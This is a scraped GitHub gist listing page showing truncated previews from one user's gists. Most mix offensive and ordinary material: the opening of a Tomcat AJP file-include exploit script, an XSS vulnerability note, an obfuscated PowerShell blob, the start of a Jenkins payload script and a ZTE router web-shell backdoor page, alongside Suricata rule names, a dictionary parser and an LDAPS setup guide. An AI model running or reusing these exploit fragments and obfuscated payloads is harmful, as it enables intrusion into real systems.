Skip to content

Instantly share code, notes, and snippets.

xax007 /
Created Feb 23, 2020
Aapche Tomcat AJP local file include and code execution exploit
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# [url][/url]
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
xax007 /
Last active Nov 20, 2019


Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
xax007 / Suricata_Rules_Descriptionaa
Created Jun 3, 2019
View Suricata_Rules_Descriptionaa
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
xax007 /
Created May 5, 2019 — forked from josephg/
Apple dictionaries
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mohave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/'
f = open(filename, 'rb')
View newol.dat
This file has been truncated, but you can view the full file.
$epGjM = [Char[ ] ]"))93]rAhc[]GNiRtS[,'tprT'(ECalPer.)63]rAhc[]GNiRtS[,)55]rAhc[+18]rAhc[+411]rAhc[+28]rAhc[+211]rAhc[((ECalPer.)'|',)77]rAhc[+79]rAhc[+94]rAhc[+38]rAhc[+15]rAhc[((ECalPer.)43]rAhc[]GNiRtS[,'VMbWd'(ECalPer.)'
xax007 /
Created Apr 11, 2019 — forked from asukakenji/
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, ie. without the help of a C compiler, etc.)

  • android
  • darwin
xax007 /
Created Mar 16, 2019 — forked from Tom4t0/
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
class Dummy{ }
xax007 / web_shell_cmd.gch
Created Nov 30, 2018
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
View web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""">
<html xmlns="">
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
F460 Webshell